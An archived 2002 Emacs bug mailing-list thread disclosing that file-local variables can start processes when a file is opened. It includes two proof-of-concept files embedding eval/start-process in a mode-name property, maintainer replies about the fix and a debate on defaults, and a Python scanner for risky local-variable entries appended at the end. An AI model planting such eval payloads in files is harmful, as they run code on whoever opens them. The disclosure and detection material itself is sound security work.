* security problem in emacs
From: Georgi Guninski @ 2002-12-31 12:17 UTC

[-- Attachment #1: Type: text/plain, Size: 297 bytes --]

Hi,

Attached file demonstrates GNU Emacs 21.2.1 starting process if a text
file is opened. Just open it with emacs and check for processes "yes".

I suggest disabling local variables by default, because probably there
are similar bugs of the same nature.

All the best in the new year!

Georgi

[-- Attachment #2: emacs1.emacs --]
[-- Type: text/plain, Size: 357 bytes --]

/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */
Emacs better than windoze.
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***

[-- Attachment #3: Type: text/plain, Size: 148 bytes --]

_______________________________________________
Bug-gnu-emacs mailing list
Bug-gnu-emacs@gnu.org
http://mail.gnu.org/mailman/listinfo/bug-gnu-emacs

* Re: security problem in emacs
From: Georgi Guninski @ 2002-12-31 14:47 UTC
Cc: bug-gnu-emacs

[-- Attachment #1: Type: text/plain, Size: 595 bytes --]

Kai Großjohann wrote:
> Georgi Guninski writes:
>
> >Attached file demonstrates GNU Emacs 21.2.1 starting process if a text
> >file is opened. Just open it with emacs and check for processes "yes".
>
> This has been fixed in the development sources. The user is asked
> whether to execute the Lisp code.
>
> Alas, this has not been fixed in the 21.3 pretest.

Is the new attached file also fixed? It requires mouse over text.

I suggest you disable local variables by default - they are not portable
and some people use emacs for examining untrusted log files or read mail.

georgi

[-- Attachment #2: emacs2.emacs --]
[-- Type: text/plain, Size: 656 bytes --]

/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */
Emacs better than windoze.
Mouse over the modeline, then check for started yes.
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("MOUSE OVER ME " 0 10 (local-map (keymap (header-line (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes")) (down-mouse-3 . mode-line-mode-menu-1)) (mode-line keymap (down-mouse-3 . mode-line-mode-menu-1))) help-echo (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes")) ) ) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***

* Re: security problem in emacs
From: Alfred M. Szmidt @ 2002-12-31 15:14 UTC
Cc: kai.grossjohann

   Is the new attached file also fixed?

Emacs CVS gives a warning about the code.

   I suggest you disable local variables by default - they are not
   portable and some people use emacs for examining untrusted log
   files or read mail.

Disabling local variables completely seems silly. Making Emacs warn
the user when running local-hook's or eval's is a far better idea;
which is done in CVS. Local variables are very useful.

* Re: security problem in emacs
From: Georgi Guninski @ 2002-12-31 15:42 UTC
Cc: kai.grossjohann

Alfred M. Szmidt wrote:
>    Is the new attached file also fixed?
>
> Emacs CVS gives a warning about the code.

So since emacs CVS fixes at least 2 security bugs you may think about
releasing a new version or at least patches.

>    I suggest you disable local variables by default - they are not
>    portable and some people use emacs for examining untrusted log
>    files or read mail.
>
> Disabling local variables completely seems silly. Making Emacs warn
> the user when running local-hook's or eval's is a far better idea;
> which is done in CVS. Local variables are very useful.

I continue to disagree that local variables on by default is a good
idea, but am tired of arguing about it. So here are some last arguments:

1. I found 2 security bugs on release version of emacs in less than
   week. How many left do you think are? Of course the idea of warning
   about eval or hooks seems good, but covering all cases of non-obvious
   evals in a large project is difficult task.

2. Lusers like micro$oft thought in the beginning that scripting in
   email/word is a good idea and it is sandboxed. Now it is off by
   default in their email products. Think about it.

3. Local variables are not portable across editors, which makes them
   almost useless, unless every document has all the version of local
   variables for every editor.

georgi

* Re: security problem in emacs
From: Miles Bader @ 2002-12-31 18:00 UTC

Georgi Guninski <guninski@guninski.com> writes:
> 1. I found 2 security bugs on release version of emacs in less than
> week. How many left do you think are? Of course the idea of warning
> about eval or hooks seems good, but covering all cases of non-obvious
> evals in a large project is difficult task.

To be fair, both your examples were already taken care of.

> 2. Lusers like micro$oft thought in the beginning that scripting in
> email/word is a good idea and it is sandboxed. Now it is off by
> default in their email products. Think about it.

This is not scripting. Whether or not emacs is as restrictive as it
should be, I don't know, but there's clearly a large subset of
variables/values that can quite safely be set.

Yes, if emacs were the kernel, it would have to take a more conservative
approach -- but it's not, and convenience _is_ important.

[Of course, it helps that the `local variables' section is not
interpreted for such obviously suspicious sources such as email or news,
and that emacs users are in general a more clueful lot than typical MS
product users]

> 3. Local variables are not portable across editors, which makes them
> almost useless, unless every document has all the version of local
> variables for every editor.

Who cares about other editors? I certainly don't.

-Miles
--
`Cars give people wonderful freedom and increase their opportunities.
But they also destroy the environment, to an extent so drastic that
they kill all social life' (from _A Pattern Language_)

* Re: security problem in emacs
From: Miles Bader @ 2002-12-31 15:30 UTC

Georgi Guninski <guninski@guninski.com> writes:
> > This has been fixed in the development sources. The user is asked
> > whether to execute the Lisp code.
>
> Is the new attached file also fixed?

Yes; here's the *Messages* output for that file:

   Process `eval' or hook local variables in file x? (y or n)
   Ignoring risky spec in the local variables list

-Miles
--
Come now, if we were really planning to harm you, would we be waiting
here, beside the path, in the very darkest part of the forest?
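
Added example (not part of any message in this thread, and not Emacs's own code): a pre-open check that parses a file's "Local Variables:" block, including the per-line prefix and suffix used in both attachments, and lists the entries worth reviewing before the file is opened. The risky-name and risky-value patterns are assumptions chosen for illustration, and the sample is constructed with a harmless placeholder form.

```python
import re

# Constructed sample with the same shape as the attachments in this thread;
# the embedded form is a harmless placeholder.
SAMPLE = '''Plain text body.
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("label" 0 4 (display (when (eval (placeholder-form)) . x))) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***
'''

# Heuristics chosen for this example (assumption, not Emacs's own rule set).
RISKY_NAME = re.compile(r"^(eval|.+-(hooks?|functions?|forms?))$", re.I)
RISKY_VALUE = re.compile(r"#\(|\(\s*eval\b")  # propertized string or nested eval

def parse_local_variables(text):
    """Return [(name, value)] from the 'Local Variables:' block near EOF."""
    lines = text[-3000:].splitlines()  # Emacs looks only near the end of a file
    for i, line in enumerate(lines):
        m = re.search(r"Local Variables:", line, re.I)
        if m:
            break
    else:
        return []
    # Text around the marker is a per-line prefix/suffix (";;;" and "***" here).
    prefix, suffix = line[:m.start()].strip(), line[m.end():].strip()
    specs = []
    for raw in lines[i + 1:]:
        body = raw.strip()
        if not body.startswith(prefix):
            break  # malformed list: stop rather than guess
        body = body[len(prefix):]
        if suffix and body.endswith(suffix):
            body = body[:-len(suffix)]
        name, sep, value = body.strip().partition(":")
        if not sep or name.strip().lower() == "end":
            break
        specs.append((name.strip(), value.strip()))
    return specs

def risky_specs(text):
    """Entries a reviewer should inspect before opening the file with locals on."""
    return [(n, v) for n, v in parse_local_variables(text)
            if RISKY_NAME.match(n) or RISKY_VALUE.search(v)]

if __name__ == "__main__":
    for name, value in risky_specs(SAMPLE):
        print(f"risky: {name} = {value}")
```

The value pattern is what catches the mode-name entry: the variable name itself looks harmless, and the eval form is nested inside the string's text properties.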